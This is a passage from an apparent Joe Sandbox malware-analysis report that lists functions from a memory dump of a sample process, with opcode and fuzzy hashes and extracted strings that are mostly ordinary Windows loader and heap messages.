                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                • API String ID: 0-3815128232
                                • Opcode ID: 1f642cb7e8564307972b9291439877ba9c748c607692b5c5da553618372c1117
                                • Instruction ID: 6df91a31ae2c21b8fc94a1ea0a65323090057e6e42f7c4df2b3fdff0c43b53b6
                                • Opcode Fuzzy Hash: 1f642cb7e8564307972b9291439877ba9c748c607692b5c5da553618372c1117
                                • Instruction Fuzzy Hash: F051F3B91007948EF355EB29C84277273E9DB45388F91884DE8C78B789DE36D847DB60
                                Function 32D732C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • Actx , xrefs: 32D732CC
                                • SXS: %s() passed the empty activation context data, xrefs: 32DB2808
                                • RtlCreateActivationContext, xrefs: 32DB2803
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: 1375de46d62e6d23666856e25246e274da12bac650dca61c4c4a40771f9e84cd
                                • Instruction ID: 67987203ccd7520715be62773a84735366ccfd00431e0aa11d3c2c88d93ede48
                                • Opcode Fuzzy Hash: 1375de46d62e6d23666856e25246e274da12bac650dca61c4c4a40771f9e84cd
                                • Instruction Fuzzy Hash: 3531ED766003059BEF16CF28D894F9A37A5EF84718F518469ED059F781CBB4E84ACBE0
                                Function 32DCB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                Download Yara Rule
                                Strings
                                • GlobalFlag, xrefs: 32DCB30F
                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 32DCB2B2
                                • @, xrefs: 32DCB2F0
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                • API String ID: 0-4192008846
                                • Opcode ID: 12bfa27571af732ea32108b42c467a6d558d1bfc864bb69a8d3df8125ca20b84
                                • Instruction ID: e059d97c7c9b471ee970ca7cd9ad81742ff2cf505a049e6b74d273cd55861747
                                • Opcode Fuzzy Hash: 12bfa27571af732ea32108b42c467a6d558d1bfc864bb69a8d3df8125ca20b84
                                • Instruction Fuzzy Hash: C1311AB5E40219AEDB11DF94DC84AEEBBBCEF44748F500469EA05BB251DB74DA04CBA0
                                Function 32D81190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                • @, xrefs: 32D811C5
                                • BuildLabEx, xrefs: 32D8122F
                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 32D8119B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-3051831665
                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                • Instruction ID: 693a83c145b0af0fb89f4361f1a45b7cbd2e00001156cb78a3c8382e1231debe
                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                • Instruction Fuzzy Hash: 07317172900659BBDF12CBA5CC45FEEBBB9EF84754F104025E915A7360DB70DA09CBA0
                                Function 32D551C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: 180f2d4c5875839d983ab4e33c1724f927ee5052b173c0506520fdcd32f8c658
                                • Instruction ID: 82ffc3a65e90370bab8b04be81f577a0d6c3d179a11812806352605c6e8bceec
                                • Opcode Fuzzy Hash: 180f2d4c5875839d983ab4e33c1724f927ee5052b173c0506520fdcd32f8c658
                                • Instruction Fuzzy Hash: 8232B0B8508351CBDB25CF14C490B2EB7E1EF88748F60492EF99597390EBB4D984CB92
                                Function 32D45622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 73c9e24d91a357feb153bd04e98b50c460c44030d041930af0018c3edd5dc531
                                • Instruction ID: 84052c1a10a4c9bc1dc298d23cf3a32c852a71ca6c4a74ca8fd1669aa4469d61
                                • Opcode Fuzzy Hash: 73c9e24d91a357feb153bd04e98b50c460c44030d041930af0018c3edd5dc531
                                • Instruction Fuzzy Hash: 0A31EF31201B52AFEB459F24CA50F8AFBA5BF94758F444125E94197B50DFB0E821CBE0
                                Function 32DBE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: d6bcbac0f4041c74ad27df5a1023d59b4699de9278ff6c7ac33790a9bdf951bd
                                • Instruction ID: 1e94fde5ec43f5bf51dc475ac881f5feb2b9f16b9ffa44bcd29edfb9b868936f
                                • Opcode Fuzzy Hash: d6bcbac0f4041c74ad27df5a1023d59b4699de9278ff6c7ac33790a9bdf951bd
                                • Instruction Fuzzy Hash: 08613CB1A003189FDB18CFA8C950BADB7F5BF48744F904069E54AEB351EB70D900CBA0
                                Function 32D5F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$
                                • API String ID: 3446177414-233714265
                                • Opcode ID: 1f4e3ee8613567e97e9f656fc0400eeead1422b0726b9fabce7fd630a310806d
                                • Instruction ID: 58584ed9933b5fe93fce1c8bf6eb8f154063cbd7177996c7d62c66dbea78e2e3
                                • Opcode Fuzzy Hash: 1f4e3ee8613567e97e9f656fc0400eeead1422b0726b9fabce7fd630a310806d
                                • Instruction Fuzzy Hash: 55619CB5A01749DFEB21CFA4C580B99B7B1BF44308F604469D555AF790CBB4A981CBA0
                                Function 32D4A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                Download Yara Rule
                                Strings
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 32D4A21B
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 32D4A229
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: cbc6465b41b99e3b454cbd535ca4a801a14456ff1bf4b07d48adfe08651d2fbc
                                • Instruction ID: 22432df6506fda8e11b3fd777bdad3d50ae561b62359f6181d6061c16d2d673e
                                • Opcode Fuzzy Hash: cbc6465b41b99e3b454cbd535ca4a801a14456ff1bf4b07d48adfe08651d2fbc
                                • Instruction Fuzzy Hash: C441BB74A407449BEB05CF6AC4A5B5AB7B4FF45B44F2080A5EC40DB3A0EE76D940DB10
                                Function 32DD314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                • API String ID: 0-118005554
                                • Opcode ID: 4fcbaa5588cb4fb98498df98d87d9f1b95c78022d8b7a1ed059e725f24e836f5
                                • Instruction ID: 1d0b387ba5acf69762e11e48b23894b7f2ef7217c7bf62407eefb8fa5c33f041
                                • Opcode Fuzzy Hash: 4fcbaa5588cb4fb98498df98d87d9f1b95c78022d8b7a1ed059e725f24e836f5
                                • Instruction Fuzzy Hash: 20312475608B818FD341CF68D880B2AB7E4EF85714F404869FC54CB790EBB1D905CB62
                                Function 32D731BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: 104235cb75a7e02c15972501dd2bb2f0e7ca0729f2be1d1ca148a012fe1db3cc
                                • Instruction ID: a8bc184f7a87c0ab81bd3e47b4ad8def40f082ac5a1257f9df7f7b83964db2f9
                                • Opcode Fuzzy Hash: 104235cb75a7e02c15972501dd2bb2f0e7ca0729f2be1d1ca148a012fe1db3cc
                                • Instruction Fuzzy Hash: 3731AFB1509385AFD350CF2CC880A8BBBE8EF95754F40492EF99483710D638DD08CBA2
                                Function 32D733D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                Strings
                                • RtlpInitializeAssemblyStorageMap, xrefs: 32DB289A
                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32DB289F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                • API String ID: 0-2653619699
                                • Opcode ID: 9f3c2bdbe9f4525e2307a219fd7be30eefd7a7bed143e1c386623bf15af58e4a
                                • Instruction ID: 179c3299ced7003ff534b1cceb5abe736f7b91cd22a36b34b60df832d4ad7e5e
                                • Opcode Fuzzy Hash: 9f3c2bdbe9f4525e2307a219fd7be30eefd7a7bed143e1c386623bf15af58e4a
                                • Instruction Fuzzy Hash: F711A0B6B00215BBFB1A8E489D45F5A76A9DF84758F608079B904AB384DAB8DD0086A0
                                Function 32D7A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Cleanup Group$Threadpool!
                                • API String ID: 2994545307-4008356553
                                • Opcode ID: 93b358036c0c7e43d9e4932295083c26e82585e9a5586fe81546bea49b61a453
                                • Instruction ID: 0b1bb016564f658a412d0e8194dc4df33da398b3a7f3601057af3f4440a75554
                                • Opcode Fuzzy Hash: 93b358036c0c7e43d9e4932295083c26e82585e9a5586fe81546bea49b61a453
                                • Instruction Fuzzy Hash: 3101D1B2150740AFE311CF28DD05B1277F8EB44B1AF008979A658C7A90E739E944CB56
                                Function 32D4C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: dd1dedb19a5a79c52923049332efe4aa1198547e1740615cb3b718766eb4ca84
                                • Instruction ID: 75818c77f79055968af1ab9738c070884b3fe29b9e75a54065bfd855d3eaa900
                                • Opcode Fuzzy Hash: dd1dedb19a5a79c52923049332efe4aa1198547e1740615cb3b718766eb4ca84
                                • Instruction Fuzzy Hash: C3823979E003189FEB14CFA9C880BADB7B1BF48354F51816AE859AB394DF709985CF50
                                Function 32D464F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e31e6c11d250a8acb19011d5e9bdfe89bab1758acba0045b5e943d1942e8c0e1
                                • Instruction ID: 9b4f58938b10647e0bc38fc7feb8dd6e579a2c20f2d576ba2328180971727f78
                                • Opcode Fuzzy Hash: e31e6c11d250a8acb19011d5e9bdfe89bab1758acba0045b5e943d1942e8c0e1
                                • Instruction Fuzzy Hash: C0E19A74608341CFD704CF28C090A5ABBE0FF88348F548A6DE98A97391DF71E946CB92
                                Function 32D6B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @[2@[2
                                • API String ID: 0-2854983874
                                • Opcode ID: cf9c90b38871ee7d6cc428aa484e4de0d4746f5dec94aa939faa7a613449e088
                                • Instruction ID: b2448fa45d8623f79c284b7852b6fab1f6fefa3c91c63f9954593e45f1c7f4ea
                                • Opcode Fuzzy Hash: cf9c90b38871ee7d6cc428aa484e4de0d4746f5dec94aa939faa7a613449e088
                                • Instruction Fuzzy Hash: 8132AFB5E01219DBDB14CFA8D890BBEBBB1FF44748F544029E845BB390EB759941CBA0
                                Function 32D41051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 9c526a2da7c6d1b0a85d87dfecd505b99cc3287838f401ab34266643def84e65
                                • Instruction ID: 2fa3f326ac4a0fa516ccb80f421a91855142235b1dbd08ddaa249d8c89744755
                                • Opcode Fuzzy Hash: 9c526a2da7c6d1b0a85d87dfecd505b99cc3287838f401ab34266643def84e65
                                • Instruction Fuzzy Hash: 5BB112B56093808FD354CF28C480A5AFBF1BB88704F54896EF899DB351DB75E885CB92
                                Function 32D47623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4dbf297a14b60a99dc066a8b99bec1535f932d715ad867cffdb8816dd7852fe6
                                • Instruction ID: a3a6573fcaf3d6c31c26573bf1f155d4a89f4b4de29979774d27bf809aa622dc
                                • Opcode Fuzzy Hash: 4dbf297a14b60a99dc066a8b99bec1535f932d715ad867cffdb8816dd7852fe6
                                • Instruction Fuzzy Hash: 28615E75A00646EFEB08CF78C480B9DFBB6BF88344F64826AD519A7350DF74A945CB90
                                Function 32D44779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 8c906c41a6dd3794b8a2832d3c2316d45a74ba12b5b148238d1d15404cfc97c8
                                • Instruction ID: fca27820470f9155c23433aad0f9dae60f380efd53c76101c0c55620154194a7
                                • Opcode Fuzzy Hash: 8c906c41a6dd3794b8a2832d3c2316d45a74ba12b5b148238d1d15404cfc97c8
                                • Instruction Fuzzy Hash: 2C41D3756003858FE715CF28D894B2ABBE9FF81395F50442DE9818B3A1DF71D885CB91
                                Function 32D3B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 27f04f865baf94e390108f9a95fb7ca542a486ea7a386cd0978cc1506bc0147d
                                • Instruction ID: 91b8915b31870ec2e8b730740e1dd25344c7fae21ef7a3a4aaa44f2bd1cbe046
                                • Opcode Fuzzy Hash: 27f04f865baf94e390108f9a95fb7ca542a486ea7a386cd0978cc1506bc0147d
                                • Instruction Fuzzy Hash: E83135725422089FC712CF14C880A5677A5FF85368F504269EE449F392CB71ED42CBE4
                                Function 32D456E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: aa355561374020b8d79e9cfb412a6239f37f0ebed40e9be3918b4ce07c8202a5
                                • Instruction ID: 526d6c4ce25ef917560aef495e9b8fd4117af29b1583e279bc817c8efc14a819
                                • Opcode Fuzzy Hash: aa355561374020b8d79e9cfb412a6239f37f0ebed40e9be3918b4ce07c8202a5
                                • Instruction Fuzzy Hash: 9731B839611A05EFEB458B24DA90F9ABBA6FF84344F449065EC408BB50DF70E830CB90
                                Function 32DEE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 699d2aab956189e0c860b890feb145e59747419b21d6d5c30206648d993a0d55
                                • Instruction ID: 3b51ef9388349024f0803c7b446e87d28fb7df10a5680e4e1a2e8047aad0b197
                                • Opcode Fuzzy Hash: 699d2aab956189e0c860b890feb145e59747419b21d6d5c30206648d993a0d55
                                • Instruction Fuzzy Hash: 293189B59053018FCB01DF19C48594ABBE1FF8A365F448AAEE4999B310D730DD49CBD2
                                Function 32D392AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: f9058ae5b4e77f8373f5b941f2c8802404d4a2a3b75146937719503db4cdf376
                                • Instruction ID: ca554bcb1efba666704dc7d10eb0b48c77baaa8ddbc2615c89660dd9db32ae9a
                                • Opcode Fuzzy Hash: f9058ae5b4e77f8373f5b941f2c8802404d4a2a3b75146937719503db4cdf376
                                • Instruction Fuzzy Hash: 9EF0FA36201A04ABD7329B18CC04F8ABBEDEF80B00F140518AA4293690CBA0E909CA60
                                Function 32D4965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                • Instruction ID: 6d9e48808a485a1f71aba2a8d2a83b4235a097d07cdf9e6531c3d8c27c228ff2
                                • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                • Instruction Fuzzy Hash: 7E6168B5D05259ABEF11CFAAC844FDEBBB5EF84754F204629E811A7350DF748A01CBA0
                                Function 32D502F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: #%u
                                • API String ID: 0-232158463
                                • Opcode ID: 1feed3a473acbf9971fcc3aae518191e00a6840d98e74e35ad9327303c6539e2
                                • Instruction ID: 2f78f6853b4ab05f772107e293b78aa9a750b49d9883b8decb7ebdab2926ad9e
                                • Opcode Fuzzy Hash: 1feed3a473acbf9971fcc3aae518191e00a6840d98e74e35ad9327303c6539e2
